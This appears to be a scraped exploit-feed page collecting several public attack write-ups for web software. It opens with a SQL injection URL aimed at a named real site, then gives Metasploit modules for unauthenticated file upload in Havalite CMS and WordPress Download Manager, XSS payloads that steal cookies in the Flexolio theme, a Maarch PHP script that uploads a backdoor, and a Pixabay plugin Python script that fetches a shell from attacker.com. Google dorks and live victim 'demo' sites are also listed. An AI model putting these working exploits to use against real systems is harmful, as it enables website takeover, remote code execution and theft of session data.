# http://www.avnv.us/classifieds/action.php?cp=1%27%20and%28select+1+from%28select+count%28*%29,concat%28%28select%20concat%28%27%3E%3E%27,version%28%29,%27%3C%3C%27%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%20--%20-
# google d0rk : intext:"Powered by Matterdaddy"
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================ |
↧
Havalite CMS Arbitary File Upload
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
'Name' => "Havalite CMS Arbitary File Upload Vulnerability",
'Description' => %q{
This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
possibly prior. Attackers can abuse the upload feature in order to upload a
malicious PHP file without authentication, which results in arbitary remote code
execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'CWH',
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '94405'],
['EDB', '26243']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => ['linux', 'php'],
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => "Jun 17 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
], self.class)
end
def peer
"#{rhost}:#{rport}"
end
#
# Checks if target is running HavaLite CMS 1.1.7
# We only flag 1.1.7 as vulnerable, because we don't have enough information from
# the vendor or OSVDB about exactly which ones are really vulnerable.
#
def check
uri = normalize_uri(target_uri.path, 'havalite/')
res = send_request_raw({'uri' => uri})
if not res
print_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''
if not version.empty? and version =~ /1\.1\.7/
print_status("#{peer} - Version found: #{version}")
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Unknown
end
#
# Uploads our malicious file
#
def upload(base)
p = get_write_exec_payload(:unlink_self=>true)
fname = "#{rand_text_alpha(5)}.php"
data = Rex::MIME::Message.new
data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'havalite', 'upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res
fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Exploit::Failure::NotFound, "#{peer} - No upload.php found")
elsif res.body =~ /"error"\:"abort"/
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to write #{fname}")
end
return fname
end
#
# Executes our uploaded malicious file
#
def exec(base, payload_fname)
res = send_request_raw({
'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)
})
if res and res.code == 404
fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
end
end
def exploit
base = target_uri.path
print_status("#{peer} - Uploading malicious file...")
fname = upload(base)
print_status("#{peer} - Executing #{fname}...")
exec(base, fname)
end
end |
↧
WordPress multiple vulnerabilities Flexolio theme
Hello list! There are Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities in Flexolio for WordPress. Which contains TimThumb and CU3ER. In April 2011 I wrote about vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote about vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). ------------------------- Affected products: ------------------------- Vulnerable are all versions of Flexolio. ------------------------- Affected vendors: ------------------------- Quarterpixel http://quarterpixel.de ---------- Details: ---------- Content Spoofing (Content Injection) (WASC-12): http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml File 1.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>http://websecurity.com.ua</link> </slide> </slides> </cu3er> Cross-Site Scripting (WASC-08): http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2 File xss.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>javascript:alert(document.cookie)</link> </slide> </slides> </cu3er> For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files. Cross-Site Scripting (WASC-08): http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/flexolio/inc/thumb.php?src=http:// And also Abuse of Functionality and DoS in vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and Arbitrary File Upload vulnerability, which was disclosed after 3,5 months after my disclosure of previous holes. They are possible in old versions of the theme, because in the last versions of the theme in TimThumb the access to remote sites is forbidden. Arbitrary File Upload (WASC-31): http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php Full path disclosure (WASC-13): FPD in php-files of the theme (by default) or in error_log. In index.php and other php-files. http://site/wp-content/themes/webfolio/ ------------ Timeline: ------------ 2013.11.22 - announced at my site about CU3ER. 2013.11.26 - informed developer. 2013.11.26 - announced at my site about plugins and later about themes. Later informed developers of the plugins and themes. 2014.04.26 - disclosed at my site about Flexolio for WordPress (http://websecurity.com.ua/7141/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua |
(1283)
↧
WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Qzz, Ali Ahmady,
Saeed.Jok3r
M4hdi, Vahid Hαcĸer, BlackErroR, Phantom.S3c
And All members of Iran Security Group
[+] iransec.net |
(334)
↧
↧
MAARCH 1.4 Arbitrary File Upload
/******************************************************
# Exploit Title: Maarch 1.4 Arbitrary file upload
# Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
# Date: 29/10/2014
# Exploit Author: Adrien Thierry
# Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
# Vendor Homepage: http://maarch.org
# Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip
# Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
# Tested on: Linux / Windows
******************************************************/
The file "file_to_index.php" is accessible without any authentication to upload a file.
This exploit code is a POC for Maarch Letterbox <= 2.4 and Maarch GEC/GED <= 1.4
Exploit code :
<?php
/* EXPLOIT URL */
$target_url= "http://website.target/apps/maarch_enterprise/";
/* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */
$indexing_path = "indexing_searching/";
/* TARGET UPLOAD FILE */
$target_file = "file_to_index.php";
/* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
$file = "backdoor.php";
/* NAME, EMPTY WITH LETTERBOX */
$name = "shell";
/* LAUNCHING EXPLOIT */
do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);
function do_post_request($url, $res, $file, $name)
{
$data = "";
$boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
$data .= "--$boundary\n";
$fileContents = file_get_contents($file);
$md5 = md5_file($file);
$ext = pathinfo($file, PATHINFO_EXTENSION);
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
$data .= "Content-Type: text/plain\n";
$data .= "Content-Transfer-Encoding: binary\n\n";
$data .= $fileContents."\n";
$data .= "--$boundary--\n";
$params = array('http' => array(
'method' => 'POST',
'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
'content' => $data
));
$ctx = stream_context_create($params);
$fp = fopen($url, 'rb', false, $ctx);
if (!$fp)
{
throw new Exception("Erreur !");
}
$response = @stream_get_contents($fp);
if ($response === false)
{
throw new Exception("Erreur !");
}
else
{
echo "file should be here : ";
/* LETTERBOX */
if(count($response) > 1) echo $response;
/* MAARCH ENTERPRISE | GEC */
else echo "<a href='" . $res . "tmp/tmp_file_" . $name . "." . $ext . "'>BACKDOOR<a>";
}
}
?> |
(143)
↧
WordPress Download Manager Unauthenticated File Upload
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Wordpress Download Manager (download-manager) Unauthenticated File Upload',
'Description' => %q{
The WordPress download-manager plugin contains multiple unauthenticated file upload
vulnerabilities which were fixed in version 2.7.5.
},
'Author' =>
[
'Mickael Nadeau', # initial discovery
'Christian Mehlmauer' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
# The module exploits another vuln not mentioned in this post, but was also fixed
['URL', 'http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html'],
['WPVDB', '7706']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['download-manager < 2.7.5', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 3 2014'))
end
def check
check_plugin_version_from_readme('download-manager', '2.7.5')
end
def exploit
filename = "#{rand_text_alpha(10)}.php"
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")
print_status("#{peer} - Uploading payload")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend, 'post.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'vars_get' => { 'task' => 'wpdm_upload_files' }
)
if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/
uploaded_filename = res.body
register_files_for_cleanup(uploaded_filename)
print_status("#{peer} - File #{uploaded_filename} successfully uploaded")
else
fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
end
file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename)
print_status("#{peer} - Calling uploaded file #{file_path}")
send_request_cgi(
{
'uri' => file_path,
'method' => 'GET'
}, 5)
end
end |
(26)
↧
WordPress Pixarbay Images 2.3 XSS / Bypass / Upload / Traversal
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
Title: WP Pixarbay Images Multiple Vulnerabilities
Product: Pixarbay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that let's you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required.
Business recommendation:
----------------------------------------------------------------------
Update to version 2.4
Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain code can be called without authentication
2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL, which allows to upload malicious files, including PHP code.
3) Path Traversal
Certain values are not sanitized before they are used in a file operation. This allows to store files outside of the "download" folder.
4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be
abused for Cross Site Scripting (XSS) attacks.
Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from
a attacker controlled host.
#!/usr/bin/env python
import argparse
import httplib, urllib
from urlparse import urlparse
def exploit(target_url, shellcode_url):
target = urlparse(target_url)
params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
print "[+] Sending download request...."
conn = httplib.HTTPConnection(target.netloc)
conn.request("POST", target.path + "/wp-admin/", params, headers)
response = conn.getresponse()
response_data = response.read()
if response.status != 200 and response_data != "Error: File attachment metadata
error":
print "[-] Something went wrong"
print response_data
exit()
conn.close()
# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example
http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should
be uploaded, for example: http://attacker.com/shell.php")
print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"
arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)
Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3
Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de |
(202)
↧
